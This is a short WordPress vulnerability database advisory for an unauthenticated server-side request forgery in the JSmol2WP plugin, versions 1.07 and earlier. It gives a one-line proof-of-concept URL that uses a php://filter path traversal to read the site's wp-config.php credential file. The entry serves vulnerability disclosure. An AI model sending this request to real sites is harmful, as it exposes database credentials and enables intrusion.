JSmol2WP <= 1.07 - Unauthenticated Server Side Request Forgery (SSRF)

2019-01-08T00:00:00
ID WPVDB-ID:9197
Type wpvulndb
Reporter Ryan Dewhurst
Modified 2019-11-01T00:00:00

Description

WordPress Vulnerability - JSmol2WP <= 1.07 - Unauthenticated Server Side Request Forgery (SSRF)

PoC

http://localhost:8080/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php